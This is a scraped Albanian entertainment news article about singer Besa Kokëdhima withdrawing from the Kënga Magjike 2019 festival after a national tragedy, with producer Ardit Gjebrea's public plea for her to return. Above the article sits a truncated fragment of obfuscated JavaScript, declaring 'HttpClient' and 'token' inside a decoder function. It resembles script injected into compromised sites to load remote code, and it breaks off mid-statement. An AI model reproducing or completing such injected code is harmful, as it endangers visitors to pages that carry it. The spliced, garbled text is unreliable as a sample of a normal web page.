;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

U tërhoq nga festivali, Arditi i drejtohet Besa Kokëdhimës

By

Këngëtarja e njohur Besa Kokëdhima ka bërë të ditur përmes rrjeteve sociale së është tërhequr nga pjesëmarrja në festivalin ‘Kënga Magjike’.

‘Zemra ime është e ngarkuar me dëshpërim dhe vuajtje për ata që nuk janë më dhe nuk jam në gjendje të këndoj kur me bashkëkombësit e mi ka ndodhur kaq shumë; ndaj më duhet të tërhiqem zyrtarisht nga ‘Kënga Magjike 2019’ – deklaroi mes tjerash këngëtarja.

 

View this post on Instagram

 

Te dashur miq, me keqardhje ju njoftoj se ne kete kohe tragjedie, pikellimi dhe paniku, e kam te pamundur te performoj “Histori” me dt 5 – 7 Dhjetor ne Kenga Magjike 2019. Zemra ime eshte e ngarkuar me deshperim dhe vuajtje per ata qe nuk jane me, dhe nuk jam ne gjendje te kendoj kur me bashkekombesit e mi ka ndodhur kaq shume; ndaj me duhet te terhiqem zyrtarisht nga Kenga Magjike 2019! Jam e bindur qe Kenga Magjike do beje nje pune te lavderueshme per te kontribuar ne menyren e saj per te ndihmuar te prekurit, une do jap ne heshtje ndihmen dhe kontributin tim per te lehtesuar sado pak dhimbjen e tyre, dhe respektuar humbjet e pashlyeshme te tyre. Kerkoj ndjese fansave te mi te cilet prisnin performimin tim dhe falenderoj organizatoret dhe @arditgjebrea per githcka kane bere per mua dhe koleget e mi! Dear friends, I regret to inform you that at this time of tragedy, sorrow and panic, I am unable to perform December 5 – 7 at Magic Song 2019. My heart is filled with despair and suffering for those who are no more, and I am not able to sing when so much has happened to my countrymen; so I have to officially withdraw my entry “History” from Magic Song 2019! I am convinced that the Magic Song will do an incredible job to contribute towards helping those affected, and I will quietly give my help and contribution to try easen their pain, and respect their irreparable losses. I apologize to my fans who were waiting for my performance and thank the organizers and @arditgjebrea for everything they have done for me and my colleagues!

A post shared by Besa (@besaofficial) on

E duket se i menjëhershëm ka qenë reagimi i producentit Ardit Gjebrea i cili ka nisur kampanjën ‘Këndoj për të ndërtuar’ duke premtuar rinovimin e një shtëpie me paratë e shitjes së biletave.

Ai i është drejtuar Besës me një koment publik ku mes tjerash shprehet: “Besa e dashur, të thashë që Kënga Magjike këtë vit do të ketë misionin ‘kendoj per te ndertuar’ dhe të gjithë bashkë do kontribuojmë për ata që kanë nevojë. Kam qënë këto ditë në Thumanë dhe vendosëm që me të ardhurat nga biletat të ndërtojmë një shtëpi nga e para dhe kjo gjë do të transmetohet të dielën në E diela shqiptare. Secili bën atë që ndjen, të gjithë artistët janë bashkë këtë herë për të ndërtuar. Të lutem mos mungo! Të gjithë ndiejmë dhimbje, por te gjithe bashke mundemi. Edhe artistët e huaj kanë ardhur për këtë kauzë! Të presim!”.

Mbetet të shihet nëse Besa do ndërrojë mendje pas kësaj thirrjeje. /Prive.al

Artikuj të ngjashëm